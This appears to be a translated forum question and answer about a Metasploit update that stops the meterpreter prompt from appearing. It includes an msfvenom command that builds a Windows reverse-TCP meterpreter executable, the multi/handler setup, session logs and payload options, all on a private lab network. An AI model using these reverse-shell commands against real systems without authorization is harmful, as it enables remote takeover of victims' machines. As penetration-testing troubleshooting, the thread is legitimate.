これはR7フォーラムに投稿した方がよいかもしれませんが、フォーラムへの投稿へのアクセスを待っているので、ここでより迅速な応答が得られるように感じます。
Kali(Metasploitバージョン4.14.10-dev)のベースインストールでは、メーターペイロードが魅力的に機能します。
ペイロードの生成は次のコマンドで行われます
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.10.95 lport=443 -f exe -o Shell.exe
Metasploitバージョン4.14.10-dev
の結果
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.10.95:443
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:50484) at 2017-08-27 11:52:45 -0400
meterpreter >
データベースをmsfupdate
で更新し、バージョン4.15.8-devに更新すると、結果は上記と同様ですが、meterpreter >
プロンプトが起動せず、コマンドが実行されません。
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.10.95:443
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:50484) at 2017-08-27 11:54:45 -0400
他の誰かがこれに遭遇したことがあり、解決方法を知っていますか?
編集:
show advanced
の出力
msf exploit(handler) > show advanced
Module advanced options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ExitOnSession false yes Return from the exploit after a session has been created
ListenerTimeout 0 no The maximum number of seconds to wait for new sessions
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session
Payload advanced options (windows/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 yes The number of connection attempts to try before exiting the process
StagerRetryWait 5.0 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Void_inへの応答として、meterpreterセッションが完全に開いていないように見えます。セッションとやり取りしたり、タスクをバックグラウンドで実行したりできません。
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.10.95
lhost => 192.168.10.95
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.10.95:443
[*] Meterpreter session 1 opened (192.168.10.95:443 -> 192.168.10.75:53518) at 2017-08-28 09:03:41 -0400
sessions -l
background
Meterpreterセッションが開きます。実行する必要があるのはsessions -l
は、すべてのセッションIDを表示してから、sessions -i <id>
。最近の更新により、デフォルトの動作としてエクスプロイト-j(エクスプロイトをジョブとして実行)が作成されました。これが、セッションがバックグラウンドで作成される理由です。